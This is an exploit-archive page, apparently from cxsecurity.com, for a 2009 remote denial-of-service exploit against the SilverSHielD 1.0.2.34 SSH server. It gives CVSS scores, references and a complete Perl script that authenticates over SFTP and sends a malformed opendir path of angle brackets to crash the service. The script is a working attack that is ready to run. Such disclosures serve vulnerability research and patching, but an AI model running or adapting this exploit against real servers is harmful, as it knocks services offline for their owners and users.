SilverSHielD 1.0.2.34 (opendir) Denial of Service Exploit

2009.02.22
Credit: Jeremy Brown
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/perl # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # SilverSHielD 1.0.2.34 DoS use Net::SSH2; $host = "192.168.0.111"; $port = 22; $username = "test"; $password = "test123"; $dos = "<<<<<<<<<<>>>>>>>>>>"; $ssh2 = Net::SSH2->new(); $ssh2->connect($host, $port) || die "\nError: Connection Refused!\n"; $ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n"; $sftp = $ssh2->sftp(); $rename = $sftp->opendir($dos); $ssh2->disconnect(); exit;

References:

http://www.securityfocus.com/bid/31884
http://www.milw0rm.com/exploits/6815
http://secunia.com/advisories/32374


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top